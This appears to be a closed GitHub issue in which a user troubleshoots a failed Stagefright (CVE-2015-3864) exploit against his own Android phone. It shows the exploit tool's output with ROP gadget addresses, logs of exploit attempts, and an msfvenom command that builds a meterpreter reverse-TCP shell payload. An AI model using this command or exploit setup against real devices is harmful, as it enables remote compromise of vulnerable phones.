Reverse shell not working on my device #8

Closed
dadreamer opened this issue Jun 16, 2017 · 1 comment

dadreamer commented Jun 16, 2017

I'm trying to get a reverse shell on my smartphone Docomo Fujitsu Arrows NX F-01F [ Android 4.4.2, build # V10R22A (kernel version 3.4.0), ARMv7 arch (armv7l, armeabi-v7a) ]. Stagefright Detector shows that this device is vulnerable to CVE-2015-3864. So I set up the environment to run scaredycat.py on Ubuntu 15.04. Also I've pulled out libc.so from the phone and generated new shellcode.bin with my IP/port params.

This is how it starts:

ubuntu@ubuntu-VirtualBox:~/scaredycat-master$ python scaredycat.py 

**************************************************
       *** SCAREDYCAT! version 0.1 beta ***       
         author:  vvn <root@nobody.ninja>
         release date: December 8, 2015

please support my work by buying a copy of my EP!

http://dreamcorp.us
http://facebook.com/dreamcorporation
**************************************************


** ON LOCAL NETWORK, URL IS: http://192.168.0.4:8080 ** 


[*] memcpy : 0xb6edf221
[*] mmap64 : 0xb6ecfeb5
b6edf09c:       e280204c        add     r2, r0, #76     ; 0x4c
b6edf0a0:       e8927ff0        ldm     r2, {r4, r5, r6, r7, r8, r9, sl, fp, ip, sp, lr}
b6edf0a4:       e33d0000        teq     sp, #0
b6edf0a8:       133e0000        teqne   lr, #0
[*] stack_pivot : 0xb6edf09c
b6ecc29e:       bd00            pop     {pc}
[*] pop_pc : 0xb6ecc29f
b6ed144c:       bd0f            pop     {r0, r1, r2, r3, pc}
[*] pop_r0_r1_r2_r3_pc : 0xb6ed144d
b6ecf6d6:       bdf0            pop     {r4, r5, r6, r7, pc}
[*] pop_r4_r5_r6_r7_pc : 0xb6ecf6d7
b6ef9bb8:       e59de040        ldr     lr, [sp, #64]   ; 0x40
b6ef9bbc:       e28dd048        add     sp, sp, #72     ; 0x48
b6ef9bc0:       e12fff1e        bx      lr
[16/Jun/2017:09:12:18] ENGINE Listening for SIGHUP.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGTERM.
[16/Jun/2017:09:12:18] ENGINE Listening for SIGUSR1.
[16/Jun/2017:09:12:18] ENGINE Bus STARTING
CherryPy Checker:
The Application mounted at '' has an empty config.

[16/Jun/2017:09:12:18] ENGINE Started monitor thread 'Autoreloader'.
[16/Jun/2017:09:12:18] ENGINE Started monitor thread '_TimeoutMonitor'.
[16/Jun/2017:09:12:18] ENGINE Serving on http://0.0.0.0:8080
[16/Jun/2017:09:12:18] ENGINE Bus STARTED

On the phone I can load that html with mp4 when I go to http://192.168.0.4:8080. When the browser loads the page I see the client's queries to the server:

********************************************************************************
exploit attempt: 1
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:18] "GET / HTTP/1.1" 200 517 "" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
********************************************************************************
exploit attempt: 2
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:22] "GET / HTTP/1.1" 200 517 "http://192.168.0.4:8080/" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
********************************************************************************
exploit attempt: 3
********************************************************************************
192.168.0.3 - - [16/Jun/2017:09:16:26] "GET / HTTP/1.1" 200 517 "http://192.168.0.4:8080/" "Mozilla/5.0 (Linux; U; Android 4.4.2; ru-; F-01F Build/V10R22A) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"

And so forth (the server reloads the page and nothing more happens). Well, I tried different browsers (the default one and Firefox), different IPs, ports etc. None of that helps. How could I check whether this CVE works on my device, or whether the shellcode is wrong, or ... ?
I create shellcode with this command:
msfvenom -p linux/armle/meterpreter/reverse_tcp lhost=192.168.0.4 lport=8080 R > ~/scaredycat-master/shellcode.bin
I assume it should be a Linux payload, not an Android one. Right?

Now I don't know what to do with this exploit so I'm gonna test other tools, e.g. Metaphor. Those might be more successful than this one, but they are more complicated.

@dadreamer dadreamer mentioned this issue Jun 16, 2017
@dadreamer
Author

Closing this as no longer relevant for me.
